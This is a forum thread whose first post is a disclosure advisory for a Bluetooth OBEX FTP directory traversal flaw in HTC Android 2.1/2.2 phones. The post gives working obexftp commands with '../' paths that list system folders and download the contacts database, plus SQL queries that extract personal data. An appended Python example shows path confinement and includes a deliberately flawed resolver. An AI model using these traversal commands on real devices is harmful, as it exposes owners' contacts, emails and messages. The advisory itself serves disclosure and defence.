Posts - Gospel

#1
Here you can find the full report of the vulnerability.

Title: HTC / Android OBEX FTP Service Directory Traversal

Author: Alberto Moreno Tablado

Vendor: HTC
Vulnerable Products:

- HTC devices running Android 2.1
- HTC devices running Android 2.2

Summary

HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.

Description

At present, HTC / Android phones include a Bluetooth stack, which provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.

The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.

In HTC / Android phones, the default directory of the OBEX FTP Server is the SDCard. Only files placed in the directory of the SDCard can be shared. The user cannot select another directory, so sensitive files related to the operating system are not exposed.

There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. The OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running the Android operating system, so the vulnerability affects this vendor specifically.

A remote attacker (who has previously obtained authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls on Linux to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing with the remote device should be enough to get them. However, more sophisticated attacks, such as sniffing the Bluetooth pairing, link key cracking and MAC address spoofing, can be used in order to avoid this. If the attacker succeeds in getting the proper privileges, further actions will be transparent to the user.

Scope of the attack

The Directory Traversal vulnerability allows a remote attacker to browse folders located anywhere in the file system and download any file contained in any folder.

1) List arbitrary directories

Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).

The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, that is, the root directory of the disk file system:

gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 29ms
Receiving "../"... Sending ".."...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder/>
  <folder name="sqlite_stmt_journals"/>
  <folder name="config"/>
  <folder name="sdcard"/>
  <folder name="d"/>
  <folder name="etc"/>
  <folder name="cache"/>
  <folder name="system"/>
  <folder name="sys"/>
  <folder name="sbin"/>
  <folder name="proc"/>
  <file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/>
  <file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/>
  <file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/>
  <file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/>
  <file name="init" size="107668" user-perm="R" created="19700101T090000Z"/>
  <file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/>
  <folder name="data"/>
  <folder name="root"/>
  <folder name="dev"/>
</folder-listing>done
Disconnecting..-done


2) Read arbitrary files

Any file located in the file system can be downloaded. This may lead to access to confidential data such as contacts, messages, emails or temporary internet files.

- Emails from the Google account downloaded via the GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database:


gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done
/done
Disconnecting..-done


Once the database is downloaded, contacts can be queried with SQL:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
...


Also contacts synced from Google and Facebook accounts can be queried from the same database:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
*********
Aitana *******
Aitana *******
********@gmail.com
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_*********
*_*******_*.jpg
...


Affected products

- HTC devices running Android 2.1
- HTC devices running Android 2.2

The following products were tested and showed to be vulnerable: HTC Wildfire A3333, Softbank 001HT (HTC Desire HD), EMobile S31HT (HTC Aria).

Vendor status

This vulnerability is related to CVE-2009-0244, a vulnerability announced in 2009 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe. After the vulnerability was disclosed, HTC issued security hotfixes under the name "Hotfix to enhance the security mechanism of Bluetooth service" for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.

The current advisory was reported to HTC Japan in 2011/02. Subsequently, it was reported to HTC Europe in 2011/04 in order to obtain more feedback and re-attempt the collaboration. In both cases I failed to coordinate the disclosure of the advisory and release of the hotfix so finally I am forced to go public with all the information undisclosed.

The vulnerability is published as a zero-day threat. This means that all HTC devices running Android 2.1 and Android 2.2 shipped as of July 2011 may be vulnerable and a security hotfix has not been issued by the manufacturer yet.

Users of HTC Android phones may expect to receive a notification for an over-the-air security update regarding this vulnerability, or find the latest updates on the support site.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

HTC Wildfire, HTC Desire HD and HTC Aria are trademarks of HTC Corporation (HTC). Softbank 001HT is a trademark of SOFTBANK Corp. EMobile S31HT is a trademark of EMOBILE Ltd.
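As an added example, not part of the advisory and not HTC's driver code: the Description section above explains that the server accepted ".." and "..\\" components and so let a paired client step outside the SD card folder, and the listing section shows the folder-listing XML the server returns. The hypothetical Python below shows the per-request confinement an OBEX FTP server should apply to SETPATH names (with a naive resolver beside it that reproduces the flaw for comparison), and a parser for the folder-listing format that applies the same name rule to what a client receives, since a listing from an untrusted server could carry a traversal name in the other direction. The shared root "/sdcard", the function names and the sample listing are assumptions constructed for this example.

```python
# Added example: hypothetical OBEX FTP path confinement and folder-listing
# parsing. Not HTC's driver nor the advisory author's code. The shared root
# "/sdcard" and the sample listing are assumptions made for this example.
import posixpath
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional, Tuple

SHARED_ROOT = "/sdcard"  # assumed default shared folder on the device


class TraversalRejected(Exception):
    """Raised when a client-supplied name would leave the shared root."""


def safe_component(name: str) -> bool:
    """A SETPATH or listing name must be exactly one path component."""
    return (name not in ("", ".", "..") and "/" not in name
            and "\\" not in name and "\x00" not in name)


def resolve_naive(cwd: str, name: str) -> str:
    """Mimics the flawed behaviour: join and normalise, so '..' escapes."""
    return posixpath.normpath(posixpath.join(cwd, name.replace("\\", "/")))


def resolve_setpath(cwd: str, name: Optional[str] = None,
                    backup: bool = False) -> str:
    """Hardened SETPATH handling: single-component names only, the backup
    (parent-folder) flag refused at the root, and the result re-checked
    against the shared-root prefix."""
    if backup:
        if posixpath.normpath(cwd) == SHARED_ROOT:
            raise TraversalRejected("backup refused at shared root")
        return posixpath.dirname(posixpath.normpath(cwd))
    if name is None:
        return SHARED_ROOT  # SETPATH without a name selects the root folder
    if not safe_component(name):
        raise TraversalRejected(f"illegal name {name!r}")
    target = posixpath.normpath(posixpath.join(cwd, name))
    if target != SHARED_ROOT and not target.startswith(SHARED_ROOT + "/"):
        raise TraversalRejected(f"{target} escapes {SHARED_ROOT}")
    return target


def walk(resolver, path: str) -> str:
    """Feed a slash- or backslash-separated client path to a resolver one
    component at a time, as successive SETPATH requests would arrive."""
    cwd = SHARED_ROOT
    for comp in path.replace("\\", "/").split("/"):
        if comp:
            cwd = resolver(cwd, comp)
    return cwd


def confined(path: str) -> bool:
    """True when the hardened resolver accepts every component of path."""
    try:
        walk(resolve_setpath, path)
        return True
    except TraversalRejected:
        return False


@dataclass
class Entry:
    kind: str  # "folder" or "file"
    name: str
    size: Optional[int]
    user_perm: Optional[str]
    created: Optional[str]


# Constructed listing modelled on the format in the advisory, not a capture.
SAMPLE_LISTING = """<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder/>
  <folder name="DCIM"/>
  <folder name="Music"/>
  <file name="notes.txt" size="118" user-perm="R" created="19700101T090000Z"/>
  <file name="../stray.txt" size="1" user-perm="R" created="19700101T090000Z"/>
</folder-listing>"""


def parse_folder_listing(xml_text: str) -> Tuple[bool, List[Entry], List[str]]:
    """Return (has parent-folder marker, entries, names a client must reject
    before using them as local file names)."""
    root = ET.fromstring(xml_text)
    if root.tag != "folder-listing":
        raise ValueError("not a folder-listing document")
    has_parent = root.find("parent-folder") is not None
    entries, rejected = [], []
    for el in root:
        if el.tag not in ("folder", "file"):
            continue
        name, size = el.get("name", ""), el.get("size")
        entries.append(Entry(el.tag, name, int(size) if size else None,
                             el.get("user-perm"), el.get("created")))
        if not safe_component(name):
            rejected.append(name)
    return has_parent, entries, rejected
```

walk() feeds a path one component at a time, the way a client issues successive SETPATH requests; confined() is the yes/no form of the hardened resolver, and the component rule is deliberately stricter than a prefix check alone so that both a parent reference and a backslash variant are refused before any path is built.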
#2
Wow, brujo. I was planning to make a grand return to the forum and make it public myself, but you beat me to it. :-)
#3
Hacking Mobile / Re: Gospel, a manual
15 January 2010, 11:58 AM
The rights to my final degree project belong to Universidad Pontificia Comillas; you cannot just rip off the documentation and copy/modify/publish it as you please.

I also don't understand why you create redundant documentation if you already have my final degree project; you are free to spread and distribute it, but not to alter it. If you want to create a document in which you contribute new information and want to cite parts (not the whole) of my final degree project, you have to cite the original source properly: Alberto Moreno Tablado, "Seguridad en Bluetooth", Universidad Pontificia Comillas, 2006. On the other hand, if you want to put my name on a document you have to ask my permission first; I have not authorised being an author of this document you are publishing.

Copying something and putting your name next to the author's without contributing anything new takes a lot of nerve.
#4
Thanks for the link, T0rete. :)

The talk went well; there were many attendees. Despite the demo effect, the practical part worked (on the second attempt) and people liked it. I left very happy.
#5
Thanks everyone!

The vulnerability affects all HTC phones with Windows Mobile 6 and Windows Mobile 6.1 except the HTC Touch Pro 2. It only affects HTC phones because the flaw is in a driver developed by HTC for the OBEX FTP service, which was later integrated into Windows Mobile.

I will be at Hackmeeting 2009 talking about the flaw and doing some practical demos.

Regards
#6
el-pollo: Did you discover all the information you provide by yourself? Did you record the video yourself too?

Please cite the sources of information you are basing this on!
#7
1. It is not a fake; the F-Secure people have written a paper documenting the attack and announcing that their mobile AV already detects the exploit (http://www.f-secure.com/weblog/archives/00001569.html)

2. How do you know it doesn't work? Have you tried it against your own Nokia phone? What nerve...
#8
Quote from: SirGraham on 27 December 2008, 10:49 AM
I take the opportunity to wish all the forum members a happy new year....
Or, as Xenu (moderator of our forum) would say, the celebration you mortals hold for completing a full turn around your star....

This Xenu and his Scientology stuff... xDDDD

HAPPY NEW YEAR to you too!
#9
Ah... I thought it would be that, because of this that I read...

http://seclists.org/fulldisclosure/2007/Jul/0602.html

Andrea is currently working on cracking open the very last thing that holds him from crafting low level Bluetooth packets, the XAP2 processor. He disassembled the firmware to find out how exactly it works; for that he wrote his own disassembler. After this he/we may write our own firmware and basically do whatever we like, for example code a full blown fuzzer or full blown attack device.

Maybe they are still at it.
#10
Updated... :)